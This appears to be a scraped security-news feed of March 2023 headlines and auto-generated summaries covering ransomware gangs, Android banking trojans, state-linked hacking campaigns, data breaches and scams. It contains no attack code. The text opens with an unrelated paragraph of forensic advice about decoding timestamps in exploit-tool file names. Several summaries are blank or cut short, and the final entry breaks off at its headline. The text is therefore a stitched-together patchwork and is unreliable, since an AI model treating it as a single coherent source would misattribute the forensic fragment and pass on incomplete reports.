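The decoded time is when the exploit tooling named the file, not when it ran: the advisory's own example shows a name decoding to August 2020 on a file that first appeared in October 2022, so compare it against the file system and IIS log timestamps rather than treating it as the intrusion date. Running the same regex over IIS logs and a directory listing of C:\Windows\Temp (the advisory's other two sources) needs no change to find_timestamp_names.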


                Mexico too dangerous for spring break, Texas officials say

                latam
                2023-03-12 https://www.bbc.co.uk/news/world-latin-america-64929565?at_medium=RSS&at_campaign=KARANGA
                Texan officials say that cartel violence represents a significant threat for those entering Mexico. "

                Autosummary: "


                Week in review: Public MS Word RCE PoC, API exploitation, Patch Tuesday forecast

                exploits
                2023-03-12 https://www.helpnetsecurity.com/2023/03/12/week-in-review-public-ms-word-rce-poc-api-exploitation-patch-tuesday-forecast/

                Microsoft to boost protection against malicious OneNote documents Microsoft has announced that, starting in April 2023, they will be adding enhanced protection when users open or download a file embedded in a OneNote document – a known high-risk phishing file type. Massive GitHub analysis reveals 10 million secrets hidden in 1 billion commits GitGuardian scanned 1.027 billion new GitHub commits in 2022 (+20% compared to 2021) and found 10,000,000 secret occurrences (+67% compared to 2021). … More

                The post Week in review: Public MS Word RCE PoC, API exploitation, Patch Tuesday forecast appeared first on Help Net Security.

                "

                Autosummary: New infosec products of the week: March 10, 2023 Here’s a look at the most interesting products from the past week, featuring releases from 1Password, GrammaTech, Kensington, Palo Alto Networks, and Persona. How STEM education can solve talent shortages, improve cybersecurity In this Help Net Security video, Avani Desai, CEO at Schellman, talks about how teaching STEM subjects like cybersecurity is essential for addressing the staffing crisis and ensuring that organizations have the talent to protect themselves from cyber threats in the years to come. "


                Acronis states that only one customer’s account has been compromised. Much ado about nothing

                government
                2023-03-12 https://securityaffairs.com/143380/hacking/acronis-downplays-security-incident.html

                Acronis downplays the severity of the recent security breach explaining that only a single customer’s account was compromised. The CISO of Acronis downplayed a recent intrusion, revealing that only one customer was impacted. This week a threat actor, who goes online with the moniker “kernelware”, claimed the theft of data from technology firm Acronis and […]

                The post Acronis states that only one customer’s account has been compromised. Much ado about nothing appeared first on Security Affairs.

                "

                Autosummary: The Acronis leak contains multiple certificate files, command logs, system configurations, system information logs, filesystem archives, python scripts for the company’s maria.db database, backup configuration stuff, and screenshots of backup operations. “Based on our investigation so far, the credentials used by a single specific customer to upload diagnostic data to Acronis support have been compromised.” "


                Medusa ransomware gang picks up steam as it targets companies worldwide

                exploits ransomware
                2023-03-12 https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/
                A ransomware operation known as Medusa has begun to pick up steam in 2023, targeting corporate victims worldwide with million-dollar ransom demands. [...] "

                Autosummary: The ransom note will also include extension contact information, including a Tor data leak site, a Tor negotiation site, a Telegram channel, a Tox ID, and the key.medusa.serviceteam@protonmail.com email address. Medusa Ransomware ransom note Source: BleepingComputer As an extra step to prevent the restoration of files from backups, the Medusa ransomware will run the following command to delete locally stored files associated with backup programs, like Windows Backup. Medusa ransomware console window Source: BleepingComputer In a regular run, without command line arguments, the Medusa ransomware will terminate over 280 Windows services and processes for programs that may prevent files from being encrypted. "


                Atera and ESET join forces to arm customers against zero-day threats

                exploits
                2023-03-11 https://www.helpnetsecurity.com/2023/03/11/atera-eset/

                Atera announced a new strategic partnership and integration with ESET, enabling Atera’s community of IT professionals to deploy anti-malware solutions to protect their customers. “As cyberattacks increase in sophistication and frequency, it is important that we partner with cybersecurity leaders like ESET to offer proactive protection against the toughest malware, and arm customers against zero-day threats,” said Gil Pekelman, CEO of Atera. “ESET’s multi-layered approach to threat detection as well as response, including threat intelligence … More

                The post Atera and ESET join forces to arm customers against zero-day threats appeared first on Help Net Security.

                "

                Autosummary: IT professionals using Atera have the option to choose from four popular solution tier packages: ESET PROTECT Entry, ESET PROTECT Advanced, ESET PROTECT Compete or ESET PROTECT Enterprise – advanced and customizable security solutions that include endpoint security, detection and response; file and mail server security; mobile security and more. "


                CISA adds VMware’s Cloud Foundation bug to Known Exploited Vulnerabilities Catalog

                exploits
                2023-03-11 https://securityaffairs.com/143336/hacking/cisa-known-exploited-vulnerabilities-catalog-vmware.html

                US CISA added an actively exploited vulnerability in VMware’s Cloud Foundation to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in VMware’s Cloud Foundation, tracked as CVE-2021-39144 (CVSS score: 9.8), to its Known Exploited Vulnerabilities Catalog. The remote code execution vulnerability resides in the XStream open-source library. Unauthenticated attackers […]

                The post CISA adds VMware’s Cloud Foundation bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                CISA warns of actively exploited Plex bug after LastPass breach

                exploits
                2023-03-11 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-plex-bug-after-lastpass-breach/
                CISA has added an almost three-year-old high-severity remote code execution (RCE) vulnerability in the Plex Media Server to its catalog of security flaws exploited in attacks. [...] "

                Autosummary: "


                Brazil seizing Flipper Zero shipments to prevent use in crime

                latam
                2023-03-11 https://www.bleepingcomputer.com/news/security/brazil-seizing-flipper-zero-shipments-to-prevent-use-in-crime/
                The Brazilian National Telecommunications Agency is seizing incoming Flipper Zero purchases due to its alleged use in criminal activity, with purchasers stating that the government agency has rejected all attempts to certify the equipment. [...] "

                Autosummary: "Anatel"s certification area informs that the equipment called FLIPPER ZERO has been used in the country by malicious users in facilitating a crime or criminal misdemeanor and, as provided for in item II of Art. 60 of the Regulation for Conformity Assessment and Homologation of Telecommunications Products (annex to Resolution No. 715, of October 23, 2019), Anatel has rejected all homologation requests for the product in question, in order to collaborate in the protection of Brazilian citizens against criminal actions," reads a letter received by Flipper Zero customers in Brazil. "


                BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads

                exploits
                2023-03-11 https://thehackernews.com/2023/03/batloader-malware-uses-google-ads-to.html
                The malware downloader known as BATLOADER has been observed abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. According to cybersecurity company eSentire, malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAI's ChatGPT, Spotify, Tableau, and Zoom. BATLOADER, as the name suggests, is a loader that's responsible for "

                Autosummary: "


                Clop ransomware gang begins extorting GoAnywhere zero-day victims

                exploits ransomware
                2023-03-11 https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-begins-extorting-goanywhere-zero-day-victims/
                The Clop ransomware gang has begun extorting companies whose data was stolen using a zero-day vulnerability in the Fortra GoAnywhere MFT secure file-sharing solution. [...] "

                Autosummary: Organizations that had their Accellion servers hacked include, among others, energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and multiple universities worldwide such as Stanford Medicine, University of Colorado, University of Miami, University of California, and the University of Maryland Baltimore (UMB). "


                PlugX malware delivered by exploiting flaws in Chinese programs

                exploits
                2023-03-11 https://securityaffairs.com/143360/malware/plugx-malware-flaws.html

                Researchers observed threat actors deploying PlugX malware by exploiting flaws in Chinese remote control programs Sunlogin and Awesun. Researchers at ASEC (AhnLab Security Emergency response Center) observed threat actors deploying the PlugX malware by exploiting vulnerabilities in the Chinese remote control software Sunlogin and Awesun. Sunlogin RCE vulnerability (CNVD-2022-10270 / CNVD-2022-03672) is known to be […]

                The post PlugX malware delivered by exploiting flaws in Chinese programs appeared first on Security Affairs.

                "

                Autosummary: "


                Young government workers show poor password management habits

                government
                2023-03-10 https://www.helpnetsecurity.com/2023/03/10/government-workers-cybersecurity-risks/

                Hybrid work has exposed another area of vulnerability, with 70% of government workers reporting they work virtually at least some of the time, according to Ivanti. The proliferation of devices, users, and locations adds complexity and new vulnerabilities for government security teams to tackle – while also combatting increasingly sophisticated threat actors. With generative AI making phishing emails increasingly more realistic, the human-sized gaps in cybersecurity are placing government agencies and organizations at increasing risk … More

                The post Young government workers show poor password management habits appeared first on Help Net Security.

                "

                Autosummary: Poor cybersecurity hygiene among government workers According to the report, a “not my job” attitude is contributing to the security risk for the public sector: 34% of government employees do not believe their actions impact their organization’s ability to stay safe; 17% don’t feel safe reporting security mistakes they’ve made to the cybersecurity team; 36% did not report a phishing email they received at work; and, alarmingly, 21% don’t care if their organization gets hacked. “We are in a state of urgency when it comes to securing critical infrastructure, along with public sector employees and the extremely sensitive data they have access to,” said Srinivas Mukkamala, CPO at Ivanti. "


                The cybersecurity landscape in the era of economic instability

                ciber
                2023-03-10 https://www.helpnetsecurity.com/2023/03/10/cybersecurity-landscape-economic-instability-video/

                Economic uncertainty is squeezing organizations globally. Gartner predicts nearly half of cybersecurity leaders will change jobs by 2025. These findings are alarming but undoubtedly unsurprising in today’s IT landscape. In this Help Net Security video, Denis Dorval, VP of International at JumpCloud, discusses how the responsibility of cybersecurity can no longer be placed on the shoulders of IT admins alone. Experts have long been advising that cybersecurity must be an organization-wide priority built into the … More

                The post The cybersecurity landscape in the era of economic instability appeared first on Help Net Security.

                "

                Autosummary: "


                Silicon Valley Bank share slump rocks financial stocks

                financial
                2023-03-10 https://www.bbc.co.uk/news/business-64911066?at_medium=RSS&at_campaign=KARANGA
                The four largest US banks lost a total of more than $50bn in market value on Thursday. "

                Autosummary: "


                Xenomorph Android malware now steals data from 400 banks

                financial exploits
                2023-03-10 https://www.bleepingcomputer.com/news/security/xenomorph-android-malware-now-steals-data-from-400-banks/
                The Xenomorph Android malware has released a new version that adds significant capabilities to conduct malicious attacks, including a new automated transfer system (ATS) framework and the ability to steal credentials for 400 banks. [...] "

                Autosummary: Countries of targeted banks (ThreatFabric) Some examples of targeted institutions include Chase, Citibank, American Express, ING, HSBC, Deutsche Bank, Wells Fargo, Amex, Citi, BNP, UniCredit, National Bank of Canada, BBVA, Santander, and Caixa. "


                Internet crime in 2022: Over $3 billion lost to investment scammers

                financial
                2023-03-10 https://www.helpnetsecurity.com/2023/03/10/internet-crime-2022/

                “In 2022, investment scam losses were the most (common or dollar amount) scheme reported to the Internet Crime Complaint Center (IC3),” the FBI shared in its 2022 Internet Crime Report. This category includes crypto-investment scams such as liquidity mining, celebrity impersonation, “pig butchering“, and many more. Business email compromise (BEC) scams are overall the second most financially destructive, followed by tech support scams and personal data breaches. 2022 Internet Crime Report: Additional findings The number … More

                The post Internet crime in 2022: Over $3 billion lost to investment scammers appeared first on Help Net Security.

                "

                Autosummary: "


                Xenomorph Android Banking Trojan Returns with a New and More Powerful Variant

                financial exploits
                2023-03-10 https://thehackernews.com/2023/03/xenomorph-android-banking-trojan.html
                A new variant of the Android banking trojan named Xenomorph has surfaced in the wild, the latest findings from ThreatFabric reveal. Named "Xenomorph 3rd generation" by the Hadoken Security Group, the threat actor behind the operation, the updated version comes with new features that allow it to perform financial fraud in a seamless manner. "This new version of the malware adds many new "

                Autosummary: Two of the Xenomorph-laced apps are listed below - Play Protect (com.great.calm) Play Protect (meritoriousness.mollah.presser) "Xenomorph v3 is deployed by a Zombinder app "bound" to a legitimate currency converter, which downloads as an "update" an application posing as Google Protect," ThreatFabric explained. "


                North Korean UNC2970 Hackers Expands Operations with New Malware Families

                exploits
                2023-03-10 https://thehackernews.com/2023/03/north-korean-unc2970-hackers-expands.html
                A North Korean espionage group tracked as UNC2970 has been observed employing previously undocumented malware families as part of a spear-phishing campaign targeting U.S. and European media and technology organizations since June 2022. Google-owned Mandiant said the threat cluster shares "multiple overlaps" with a long-running operation dubbed "Dream Job" that employs job recruitment lures in "

                Autosummary: Establishing a foothold within compromised environments is achieved by means of a C++-based backdoor known as PLANKWALK that then paves the way for the distribution of additional tooling such as: TOUCHSHIFT, a malware dropper that loads follow-on malware ranging from keyloggers and screenshot utilities to full-featured backdoors; TOUCHSHOT, software that's configured to take a screenshot every three seconds; TOUCHKEY, a keylogger that captures keystrokes and clipboard data; HOOKSHOT, a tunneling tool that connects over TCP to communicate with the command-and-control (C2) server; TOUCHMOVE, a loader that's designed to decrypt and execute a payload on the machine; and SIDESHOW, a C/C++ backdoor that runs arbitrary commands and communicates via HTTP POST requests with its C2 server. UNC2970 is also said to have leveraged Microsoft Intune, an endpoint management solution, to drop a bespoke PowerShell script containing a Base64-encoded payload referred to as CLOUDBURST, a C-based backdoor that communicates via HTTP. "


                AT&T is notifying millions of customers of data breach after a third-party vendor hack

                financial
                2023-03-10 https://securityaffairs.com/143303/data-breach/att-warns-data-breach.html

                AT&T is warning some of its customers that some of their information was exposed after the hack of a third-party vendor’s system. AT&T is notifying millions of customers that some of their information was exposed after a third-party vendor was hacked. CPNI is information related to the telecommunications services purchased by the customers, including the […]

                The post AT&T is notifying millions of customers of data breach after a third-party vendor hack appeared first on Security Affairs.

                "

                Autosummary: "


                Mental health provider Cerebral alerts 3.1M people of data breach

                financial
                2023-03-10 https://www.bleepingcomputer.com/news/security/mental-health-provider-cerebral-alerts-31m-people-of-data-breach/
                Healthcare platform Cerebral is sending data breach notices to 3.18 million people who have interacted with its websites, applications, and telehealth services. [...] "

                Autosummary: In general, the company lists the following information as potentially exposed: full name, phone number, email address, date of birth, IP address, Cerebral client ID number, demographic information, self-assessment responses and associated health information, subscription plan type, appointment dates, treatment details and other clinical information, and health insurance/pharmacy benefit information. This information may have been leaked to third parties from October 12, 2019, through January 3, 2023, when the company realized that data was being exposed via tracking pixels. "


                WhatsApp and UK government on collision course, as app vows not to remove end-to-end encryption

                government
                2023-03-10 https://www.bitdefender.com/blog/hotforsecurity/whatsapp-and-uk-government-on-collision-course-as-app-vows-not-to-remove-end-to-end-encryption/
                The boss of WhatsApp, the most popular messaging platform in the UK, says that it will not remove end-to-end encryption from the app to comply with requirements set out in the UK government's online safety bill. Learn more in my article on the Hot for Security blog. "

                Autosummary: "


                Pirated copies of Final Cut Pro infect Macs with cryptojacking malware

                exploits
                2023-03-10 https://grahamcluley.com/pirated-copies-of-final-cut-pro-infect-macs-with-cryptojacking-malware/
                Torrents on The Pirate Bay which claim to contain Final Cut Pro are instead being used to distribute cryptojacking malware to Macs. "

                Autosummary: Take, for instance, if you decide that you don’t fancy paying the $300 or so that Apple charges for the Mac edition of Final Cut Pro. Maybe you decide that because you can’t afford to pay that for video-editing software that you’ll venture onto the internet instead, and see if you can download a pirated version of Final Cut Pro from a torrent instead. "


                China-linked Hackers Targeting Unpatched SonicWall SMA Devices with Malware

                exploits
                2023-03-10 https://thehackernews.com/2023/03/china-linked-hackers-targeting.html
                A suspected China-linked hacking campaign has been observed targeting unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to drop malware and establish long-term persistence. "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades," cybersecurity company Mandiant said in a technical report published this week. The "

                Autosummary: "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades," cybersecurity company Mandiant said in a technical report published this week. "


                Latest version of Xenomorph Android malware targets 400 banks

                financial exploits
                2023-03-10 https://securityaffairs.com/143316/malware/xenomorph-android-malware-v3.html

                A new version of the Xenomorph Android malware includes a new automated transfer system framework and targets 400 banks. The author of the Xenomorph Android malware, the Hadoken Security Group, continues to improve their malicious code. In February 2022, researchers from ThreatFabric first spotted the Xenomorph malware, which was distributed via the official Google Play Store […]

                The post Latest version of Xenomorph Android malware targets 400 banks appeared first on Security Affairs.

                "

                Autosummary: The new variant supports a new automated transfer system (ATS) framework and can target over 400 banks and financial institutions mainly from Spain, Turkey, Poland, the United States, Australia, Canada, Italy, Portugal, France, Germany, UAE, and India. “This new version of the malware adds many new capabilities to an already feature rich Android Banker, most notably the introduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement a complete ATS framework.” "


                New GoBruteforcer malware targets phpMyAdmin, MySQL, FTP, Postgres

                exploits
                2023-03-10 https://www.bleepingcomputer.com/news/security/new-gobruteforcer-malware-targets-phpmyadmin-mysql-ftp-postgres/
                A newly discovered Golang-based botnet malware scans for and infects web servers running phpMyAdmin, MySQL, FTP, and Postgres services. [...] "

                Autosummary: "


                Security researchers targeted with new malware via job offers on LinkedIn

                exploits
                2023-03-10 https://www.bleepingcomputer.com/news/security/security-researchers-targeted-with-new-malware-via-job-offers-on-linkedin/
                A suspected North Korean hacking group is targeting security researchers and media organizations in the U.S. and Europe with fake job offers that lead to the deployment of three new, custom malware families. [...] "

                Autosummary: TouchShift then loads another screenshot utility called “TouchShot,” a keylogger named “TouchKey,” a tunneller named “HookShot,” a new loader named “TouchMove,” and a new backdoor named “SideShow.” However, Mandiant observed enough differences in the employed tools, infrastructure, and TTPs (tactics, techniques, and procedures) to attribute this campaign to a separate group they track as “UNC2970.” "


                CISA warns of critical VMware RCE flaw exploited in attacks

                exploits
                2023-03-10 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-vmware-rce-flaw-exploited-in-attacks/
                CISA has added a critical severity vulnerability in VMware's Cloud Foundation to its catalog of security flaws exploited in the wild. [...] "

                Autosummary: "If successfully exploited, the impact of these vulnerabilities could be catastrophic, allowing attackers to execute arbitrary code, steal data, and/or take control of the network infrastructure. "


                Blackbaud to pay $3M for misleading ransomware attack disclosure

                exploits ransomware
                2023-03-10 https://www.bleepingcomputer.com/news/security/blackbaud-to-pay-3m-for-misleading-ransomware-attack-disclosure/
                Cloud software provider Blackbaud has agreed to pay $3 million to settle charges brought by the Securities and Exchange Commission (SEC), alleging that it failed to disclose the full impact of a 2020 ransomware attack that affected more than 13,000 customers. [...] "

                Autosummary: The organizations impacted by the incident include many entities, such as charities, foundations, non-profits, and universities worldwide, from the U.S., Canada, the U.K., and the Netherlands. "


                The Week in Ransomware - March 10th 2023 - Police Take Action

                exploits ransomware
                2023-03-10 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-10th-2023-police-take-action/
                This week"s biggest news was the coordinated, international law enforcement operation between Europol, the FBI, the Netherlands, Germany, and Ukraine that targeted the DoppelPaymer operation. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @serghei, @Seifreed, @malwrhunterteam, @demonslay335, @LawrenceAbrams, @billtoulas, @fwosar, @PolarToffee, @LabsSentinel, @BrettCallow, @security_score, @AhnLab_SecuInfo, @AJVicens, @AlvieriD, @pcrisk, @chum1ng0, and @TrendMicro. Finally, we learned more about various ransomware attacks this week, including ones on the City of Oakland, Hospital Clínic de Barcelona, Technion, Fonasa, and the Minneapolis Public Schools district. "


                Microsoft OneNote to get enhanced security after recent malware abuse

                exploits
                2023-03-10 https://www.bleepingcomputer.com/news/microsoft/microsoft-onenote-to-get-enhanced-security-after-recent-malware-abuse/
                Microsoft is working on introducing improved protection against phishing attacks pushing malware via malicious Microsoft OneNote files. [...] "

                Autosummary: Unfortunately, it only takes one user to accidentally run a malicious file to infect themselves with information-stealing malware or, even worse, trigger a ransomware attack. "


                Malware targeting SonicWall devices could survive firmware updates

                exploits
                2023-03-10 https://www.malwarebytes.com/blog/news/2023/03/chinese-malware-on-sonicwall-devices-persistent-despite-firmware-updates

                Categories: News

                Researchers at Mandiant have identified a campaign that persisted on SonicWall SMA 100 Series appliances tenaciously.

                (Read more...)

                The post Malware targeting SonicWall devices could survive firmware updates appeared first on Malwarebytes Labs.

                "

                Autosummary: In a blog post from March 1, 2023 SonicWall describes the patch and states that: SonicWall has taken the approach of incorporating security enhancements in their products, such as the SMA 100 series, which helps identify potentially compromised devices by performing several checks at the operating system level and baselining normal operating system state. "


                Mexico kidnapping: A twisted moral code explains cartel's apology

                latam
                2023-03-10 https://www.bbc.co.uk/news/world-latin-america-64921765?at_medium=RSS&at_campaign=KARANGA
                Mexico"s criminal gangs adopt a warped code of ethics - and the kidnap of Americans broke the rules. "

                Autosummary: "


                Silicon Valley Bank: Regulators take over as failure raises fears

                financial
                2023-03-10 https://www.bbc.co.uk/news/business-64915616?at_medium=RSS&at_campaign=KARANGA
                Regulators take over Silicon Valley Bank as the collapse raises wider fears about the banking sector. "

                Autosummary: "


                Common WhatsApp scams and how to avoid them

                financial
                2023-03-10 https://www.welivesecurity.com/2023/03/10/common-whatsapp-scams-how-avoid/

                Here"s a roundup of some of the most common tricks that fraudsters use to dupe their victims on WhatsApp – and what you can do to protect yourself against them.

                The post Common WhatsApp scams and how to avoid them appeared first on WeLiveSecurity

                "

                Autosummary: Of all kinds of scams, romance scams can be particularly nefarious and damaging: they manipulate the victim’s feelings of trust, love, emotional connection, along with a profound desire for a romantic relationship and to help “no matter what.” In scenarios like this one, the scammer will take advantage of your hopes, leading you to trust them until they ask for a favor, accompanied by a meticulously cooked-up sob story about them badly needing money in order to help their relative or get out of trouble. Smishing and verification codes: Your phone “beeps”: you’ve just received a text message with an unsolicited authentication code that claims to be from Microsoft, Google, or even WhatsApp. Charity scams – “$10 is enough to help”: Supporting a charity or cause, when we have the means, is a noble thing to do. The fraudsters often use emotional tactics, such as claiming to help victims of natural disasters or illness, to trick people into giving money. Surveys, packages and lotteries – they’re all fake: Instead of a money transfer, you might also be deceived into handing over your personal information. "


                Smashing Security podcast #312: Rule 34, Twitter scams, and Facebook fails

                financial
                2023-03-09 https://grahamcluley.com/smashing-security-podcast-312/
                Scammers get pwned by a Canadian granny! Don’t be seduced in a bar by an iPhone thief! And will the US Marshals be able to track down the villains who stole their data? All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Anna Brading. Plus don’t miss our featured interview with Jason Meller of Kolide. "

                Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Anna Brading – @annabrading Episode links: Sponsored by: Bitwarden – Password security you can trust. "


                IceFire ransomware now encrypts both Linux and Windows systems

                exploits ransomware
                2023-03-09 https://www.bleepingcomputer.com/news/security/icefire-ransomware-now-encrypts-both-linux-and-windows-systems/
                Threat actors linked to the IceFire ransomware operation are now actively targeting Linux systems worldwide with a new dedicated encryptor. [...] "

                Autosummary: Emsisoft CTO Fabian Wosar previously told BleepingComputer that other ransomware gangs (besides the ones we have already reported on), including Babuk, GoGoogle, Snatch, PureLocker, Mespinoza, RansomExx/Defray, and DarkSide, have developed and deployed their own Linux encryptors in attacks. "


                Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware

                exploits
                2023-03-09 https://thehackernews.com/2023/03/hackers-exploiting-remote-desktop.html
                Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC), in a new analysis, said it marks the continued abuse of the flaws to deliver a variety of payloads on compromised systems. This includes the Sliver post-exploitation framework, XMRig cryptocurrency "

                Autosummary: "PlugX operators use a high variety of trusted binaries which are vulnerable to DLL Side-Loading, including numerous anti-virus executables," Security Joes noted in a September 2022 report. "


                IceFire Ransomware Exploits IBM Aspera Faspex to Attack Linux-Powered Enterprise Networks

                exploits ransomware
                2023-03-09 https://thehackernews.com/2023/03/icefire-linux-ransomware.html
                A previously known Windows-based ransomware strain known as IceFire has expanded its focus to target Linux enterprise networks belonging to several media and entertainment sector organizations across the world. The intrusions entail the exploitation of a recently disclosed deserialization vulnerability in IBM Aspera Faspex file-sharing software (CVE-2022-47986, CVSS score: 9.8), according to "

                Autosummary: "


                Iranian Hackers Target Women Involved in Human Rights and Middle East Politics

                industry
                2023-03-09 https://thehackernews.com/2023/03/iranian-hackers-target-women-involved.html
                Iranian state-sponsored actors are continuing to engage in social engineering campaigns targeting researchers by impersonating a U.S. think tank. "Notably the targets in this instance were all women who are actively involved in political affairs and human rights in the Middle East region," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The cybersecurity "

                Autosummary: "The group undertakes intelligence gathering, often human focused intelligence, like extracting the contents of mailboxes, contact lists, travel plans, relationships, physical location, etc. "


                Recently discovered IceFire Ransomware now also targets Linux systems

                exploits ransomware
                2023-03-09 https://securityaffairs.com/143261/malware/icefire-ransomware-targets-linux.html

                The recently discovered Windows ransomware IceFire now also targets Linux enterprise networks in multiple sectors. SentinelLabs researchers discovered new Linux versions of the recently discovered IceFire ransomware that was employed in attacks against several media and entertainment organizations worldwide. The ransomware initially targeted only Windows-based systems, with a focus on technology companies. IceFire was first detected in […]

                The post Recently discovered IceFire Ransomware now also targets Linux systems appeared first on Security Affairs.

                "

                Autosummary: Already seen victim companies from multiple countries, including multiple victims from 1-1 countries in the past < 40 hours, so they started "hard" it seems…@demonslay335 pic.twitter.com/QfguAicNYO — MalwareHunterTeam (@malwrhunterteam) March 14, 2022 The experts observed threat actors exploiting a deserialization vulnerability in IBM Aspera Faspex file-sharing software (CVE-2022-47986, CVSS score: 9.8) to deploy the ransomware. "


                SonicWall devices infected by malware that survives firmware upgrades

                exploits
                2023-03-09 https://www.bleepingcomputer.com/news/security/sonicwall-devices-infected-by-malware-that-survives-firmware-upgrades/
                A suspected Chinese hacking campaign has been targeting unpatched SonicWall Secure Mobile Access (SMA) appliances to install custom malware that establishes long-term persistence for cyber espionage campaigns. [...] "

                Autosummary: For example, there’s a script named "iptabled" that is essentially the same module as firewalld but will be only called by the startup script ("rc.local") if the primary malware process exits, crashes, or can’t be launched. "


                AT&T alerts 9 million customers of data breach after vendor hack

                financial
                2023-03-09 https://www.bleepingcomputer.com/news/security/atandt-alerts-9-million-customers-of-data-breach-after-vendor-hack/
                AT&T is notifying roughly 9 million customers that some of their information has been exposed after one of its marketing vendors was hacked in January. [...] "

                Autosummary: "


                TSA tells US aviation industry to boost its cybersecurity

                industry ciber
                2023-03-09 https://www.tripwire.com/state-of-security/tsa-tells-us-aviation-industry-boost-its-cybersecurity
                The US Transportation and Security Administration (TSA) has issued new requirements for airport and aircraft operators who, they say, are facing a "persistent cybersecurity threat." Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                SonicWall SMA appliance infected by a custom malware allegedly developed by Chinese hackers

                exploits
                2023-03-09 https://securityaffairs.com/143273/hacking/sonicwall-sma-custom-malware.html

                Alleged China-linked threat actors infected unpatched SonicWall Secure Mobile Access (SMA) appliances with a custom backdoor. Mandiant researchers reported that alleged China-linked threat actors, tracked as UNC4540, deployed custom malware on a SonicWall SMA appliance. The malware allows attackers to steal user credentials, achieve persistence through firmware upgrades, and provides shell access. The analysis of a […]

                The post SonicWall SMA appliance infected by a custom malware allegedly developed by Chinese hackers appeared first on Security Affairs.

                "

                Autosummary: "


                Police seize Netwire RAT malware infrastructure, arrest admin

                exploits
                2023-03-09 https://www.bleepingcomputer.com/news/security/police-seize-netwire-rat-malware-infrastructure-arrest-admin/
                An international law enforcement operation involving the FBI and police agencies worldwide led to the arrest of the suspected administrator of the NetWire remote access trojan and the seizure of the service’s web domain and hosting server. [...] "

                Autosummary: "


                AI is taking phishing attacks to a whole new level of sophistication

                financial
                2023-03-08 https://www.helpnetsecurity.com/2023/03/08/sophistication-of-phishing-emails/

                92% of organizations have fallen victim to successful phishing attacks in the last 12 months, while 91% of organizations have admitted to experiencing email data loss, according to Egress. Not surprisingly, 99% of cybersecurity leaders confess to being stressed about email security. Specifically, 98% are frustrated with their Secure Email Gateway (SEG), with 53% conceding that too many phishing attacks bypass it. “The growing sophistication of phishing emails is a major threat to organizations and … More

                The post AI is taking phishing attacks to a whole new level of sophistication appeared first on Help Net Security.

                "

                Autosummary: “Unfortunately, phishing attacks will only become more advanced in the future, as cybercriminals use AI-powered technologies, such as chatbots, to automate and improve their attacks, such as adding video and voice capabilities to text-based phishing,” Chapman concluded. "


                Three crucial moments when founding a cybersecurity startup

                ciber
                2023-03-08 https://www.helpnetsecurity.com/2023/03/08/building-perfect-cybersecurity-startup/

                With 10% of startups failing in the first year, making wise and future-proof decisions for your new cybersecurity venture is essential. Building the perfect cybersecurity startup As society adapts to an increasingly digital world, opportunities for cybercrime and attacks are also mounting. Consequently, more and more cybersecurity businesses are popping up, and the market is becoming more saturated with each quarter that passes. While there’s no blueprint for building the perfect cybersecurity startup, there are … More

                The post Three crucial moments when founding a cybersecurity startup appeared first on Help Net Security.

                "

                Autosummary: It’s never too early to start networking It’s no secret that networking offers invaluable opportunities, from practicing communication and sales skills to meeting potential customers, suppliers, partners, and investors. Certified Information Security Auditor (CISA) CompTIA Security+ These three certifications are often regarded as the industry standard, so depending on the type of cybersecurity startup you have, you’ll likely want to broaden your expertise by earning those. "


                How STEM education can solve talent shortages, improve cybersecurity

                ciber
                2023-03-08 https://www.helpnetsecurity.com/2023/03/08/stem-education-solve-talent-shortages-improve-cybersecurity-video/

                In this Help Net Security video, Avani Desai, CEO at Schellman, talks about how teaching STEM subjects like cybersecurity is essential for addressing the staffing crisis and ensuring that organizations have the talent to protect themselves from cyber threats in the years to come. In addition, teaching STEM subjects like cybersecurity can help promote diversity and inclusion in the tech industry. By providing opportunities for underrepresented groups to learn about cybersecurity and pursue careers in … More

                The post How STEM education can solve talent shortages, improve cybersecurity appeared first on Help Net Security.

                "

                Autosummary: "


                Attackers exploit APIs faster than ever before

                exploits
                2023-03-08 https://www.helpnetsecurity.com/2023/03/08/api-threat-landscape/

                After combing through 350,000 reports to find 650 API-specific vulnerabilities from 337 different vendors and tracking 115 published exploits impacting these vulnerabilities, the results clearly illustrate that the API threat landscape is becoming more dangerous, according to Wallarm. API attack analysis for 2022 Researchers came to this conclusion based on the 2022 data, specifically these three trends: Attack growth In 2022 there was a huge increase in attacks against Wallarm’s customers’ APIs, which ballooned over … More

                The post Attackers exploit APIs faster than ever before appeared first on Help Net Security.

                "

                Autosummary: "


                Lazarus Group Exploits Zero-Day Vulnerability to Hack South Korean Financial Entity

                financial exploits
                2023-03-08 https://thehackernews.com/2023/03/lazarus-group-exploits-zero-day.html
                The North Korea-linked Lazarus Group has been observed weaponizing flaws in an undisclosed software to breach a financial business entity in South Korea twice within a span of a year. While the first attack in May 2022 entailed the use of a vulnerable version of a certificate software that’s widely used by public institutions and universities, the re-infiltration in October 2022 involved the "

                Autosummary: "


                Sharp Panda Using New Soul Framework Version to Target Southeast Asian Governments

                government
                2023-03-08 https://thehackernews.com/2023/03/sharp-panda-using-new-soul-framework.html
